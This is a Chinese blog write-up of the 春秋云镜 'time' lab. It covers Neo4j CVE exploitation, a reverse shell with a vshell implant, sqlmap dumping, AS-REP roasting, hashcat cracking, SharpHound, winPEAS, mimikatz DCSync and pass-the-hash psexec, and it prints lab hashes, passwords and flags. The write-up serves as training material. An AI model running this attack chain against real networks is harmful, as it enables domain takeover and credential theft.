春秋云镜-time
信息收集
拿到ip直接访问仍然啥也没有,上fscan扫
1 | fscan.exe -h 39.98.108.27 |


还是啥也没有,使用rustscan做全端口扫描,然后用fscan进行端口信息收集
1 | rustscan.exe -a 39.98.108.27 -r 1-65535 |


1 | fscan.exe -h 39.98.108.27 -p 1337,7473,7474,7687,35145 |
7474-Neo4j-CVE-2021-34371




反弹shell后wget vshell马

1 | flag{838821b4-1509-4f21-b121-3fd2135a666c} |
提示:Kerberos

内网信息收集+隧道
1 | 172.22.6.12 DC:DC-PROGAME.xiaorang.lab |
sql注入拿下172.22.6.38

1 | proxychains sqlmap -r 1.txt --dump-all |


1 | flag{b142f5ce-d9b8-4b73-9012-ad75175ba029} |
进入系统


没东西的
AS_REP Roasting打172.22.6.12
获得一堆账号,结合上面的Kerberos联想到AS_REP Roasting攻击
kerbrute_linux_amd64筛选合法用户名
1 | proxychains kerbrute_linux_amd64 userenum --dc 172.22.6.12 -d xiaorang.lab 1.txt |
使用GetNPUsers查找不需要Kerberos预身份验证的用户
1 | proxychains impacket-GetNPUsers -dc-ip 172.22.6.12 -usersfile 1.txt xiaorang.lab/ |




hashcat爆
1 | hashcat.exe -a 0 -m 18200 --force $krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:20f355db7c4b460811e3430fb15654e0$4620c636dad1841a44bba33b52db3ff183d823e2efb4573096d2239116a6a1f25ab5ae0c403e0bc25c5a170a2d59edfc4e0619b575aaab8cbe178aee4a13842372fcd01c2ac7f932bf3abda48030bf1852ce1ea51c4b9c9b5b5b642f471016bfba207811bd94d416c07f147277a6161464f1fcb008cd3fd14ca8ffa6cca872361a1e0bc460abc4150a726c66c2bdcce440011b951a6aec7c6e82c6e8009807ef208269a798acb10296f7d4e7800f5144f13d65515dadaa8f14c1b7ce947231457176810e2af8363f72fdd593a938b13780c007bdd2d42d0e88e9d60faa55d7f6c93550f5b64bc5a0d3e71219 D:/ctf/web/wificrack/dict/rockyou.txt -w 3 |


1 | zhangxin@XIAORANG.LAB:strawberry |
1 | proxychains xfreerdp3 /v:172.22.6.25 /u:wenshao /p:'hellokitty' /cert:ignore /drive:/tmp |
发现rdp都登的上172.22.6.25,上不了DC(想来没那么轻松)

权限配置错误拿域控
上传sharphound信息收集(多用几个版本)
1 | sharphound.exe -c All |


YUXUAN这个用户hassidhistroy 域控组用户Admin,只要拿下YUXUAN就能抓出Admin的哈希
winPEAS信息收集一手
1 | winPEASany.exe |

拿到自动登陆账户yuxuan的明文账密
直接登陆抓域管hash
1 | mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit" |

哈希横向
1 | proxychains python3 psexec.py -hashes aaaa:04d93ffd6f5f6e4490e0de23f240a5e9 administrator@172.22.6.12 |

1 | flag{65ab6c04-6670-4864-9373-584e3594c5f1} |
1 | proxychains python3 psexec.py -hashes aaaa:04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/Administrator@172.22.6.25 |

本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 荒海听雪眠!
评论
ValineDisqus